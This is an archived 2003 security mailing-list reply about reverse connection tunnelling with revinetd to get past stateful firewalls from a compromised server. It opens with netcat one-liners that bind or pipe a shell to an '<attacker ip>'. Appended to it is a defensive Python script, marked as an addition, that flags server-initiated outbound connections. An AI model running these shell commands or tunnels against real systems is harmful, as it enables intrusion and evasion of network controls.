RE: command-line reverse connection tunnel?
From: Steven Gill <gman1120(at)hotmail.com>
Date: Sun Mar 16 2003 - 22:26:33 EST
nc -l -p <port> -e /bin/sh or nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and stdout connected to the above ports respectively.

But we want to use more robust services other than shell, such as getting GUI on Windows via terminal services or other more complex protocols. Let's take for example a service on a machine that is not NAT'd but a border server we can compromise has access to it. You can use rinetd, fpipe, stunnel, etc. for forward redirection. In these cases, there need to be 2 holes punched through on the server, 1 for the shell used to compromise the server (like www or telnet) and then the port for the redirector to listen on.

Revinetd is used for port redirection where the server appears to be the initiator of the connectivity. You theoretically only need one port open in the forward direction, which is the shell. All other connectivity is initiated outbound from the server, so a stateful firewall would see the port redirector traffic as NEW in the connection table from the server, allowing us to utilize more liberal rule sets that we know most organizations allow.

Now I know revinetd is not the only thing to use for it. It was brought to my attention that socat can be used for this, but I wanted a tool that was just used for reverse port forwarding and was intuitive to use.

I hope this answers your question.

Steve

> From: "Filip Maertens" <filip@securax.be>
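The post's key observation is that a reverse redirector shows up on a stateful firewall as a NEW connection initiated by the server itself. The following added example (not from the original post or from revinetd) turns that into a detection check: it parses constructed conntrack-style event lines and flags any NEW connection a monitored server initiates that is not in its expected egress allowlist. All addresses, ports and the allowlist are constructed for the example.

```python
import ipaddress
import re

# Constructed conntrack-style events (format modelled on `conntrack -E`).
# In a [NEW] event the first src=/dst= pair is the original direction,
# so "src" is the host that initiated the connection.
SAMPLE_EVENTS = """\
[NEW] tcp      6 120 SYN_SENT src=10.0.0.5 dst=10.0.0.53 sport=40211 dport=53 [UNREPLIED] src=10.0.0.53 dst=10.0.0.5 sport=53 dport=40211
[NEW] tcp      6 120 SYN_SENT src=198.51.100.9 dst=10.0.0.5 sport=51000 dport=80 [UNREPLIED] src=10.0.0.5 dst=198.51.100.9 sport=80 dport=51000
[NEW] tcp      6 120 SYN_SENT src=10.0.0.5 dst=198.51.100.9 sport=41000 dport=1234 [UNREPLIED] src=198.51.100.9 dst=10.0.0.5 sport=1234 dport=41000
[UPDATE] tcp   6 432000 ESTABLISHED src=10.0.0.5 dst=198.51.100.9 sport=41000 dport=1234 src=198.51.100.9 dst=10.0.0.5 sport=1234 dport=41000 [ASSURED]
[NEW] tcp      6 120 SYN_SENT src=10.0.0.5 dst=10.0.0.20 sport=41001 dport=3389 [UNREPLIED] src=10.0.0.20 dst=10.0.0.5 sport=3389 dport=41001
"""

# Constructed egress allowlist: what the exposed web server 10.0.0.5 is
# expected to initiate on its own (here only DNS to the internal resolver).
EGRESS_POLICY = {
    "10.0.0.5": {
        (ipaddress.ip_network("10.0.0.53/32"), "tcp", 53),
        (ipaddress.ip_network("10.0.0.53/32"), "udp", 53),
    },
}

# Captures the event type, protocol and the first (original-direction) tuple.
EVENT_RE = re.compile(
    r"^\[(?P<event>\w+)\]\s+(?P<proto>\w+).*?src=(?P<src>\S+)\s+dst=(?P<dst>\S+)"
    r"\s+sport=(?P<sport>\d+)\s+dport=(?P<dport>\d+)"
)


def parse_event(line):
    """Return a dict for one conntrack event line, or None if it does not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {"event": m["event"], "proto": m["proto"], "src": m["src"],
            "dst": m["dst"], "sport": int(m["sport"]), "dport": int(m["dport"])}


def find_unexpected_egress(events, policy):
    """List (src, dst, proto, dport) for NEW connections a monitored server
    initiated that its egress policy does not allow."""
    findings = []
    for line in events.splitlines():
        ev = parse_event(line)
        if ev is None or ev["event"] != "NEW" or ev["src"] not in policy:
            continue  # inbound-initiated, non-NEW, or not a server we watch
        dst = ipaddress.ip_address(ev["dst"])
        allowed = any(dst in net and ev["proto"] == proto and ev["dport"] == port
                      for net, proto, port in policy[ev["src"]])
        if not allowed:
            findings.append((ev["src"], ev["dst"], ev["proto"], ev["dport"]))
    return findings


if __name__ == "__main__":
    for f in find_unexpected_egress(SAMPLE_EVENTS, EGRESS_POLICY):
        print("server-initiated NEW connection outside policy: %s -> %s %s/%d" % f)
```

The two hits are the server reaching out to an external host on 1234 and to an internal host on 3389, which is exactly the traffic pattern the post describes; an ESTABLISHED update for the same flow is ignored because the decision is made on the NEW event.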
Received on Mon Mar 17 11:34:48 2003
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:34 EDT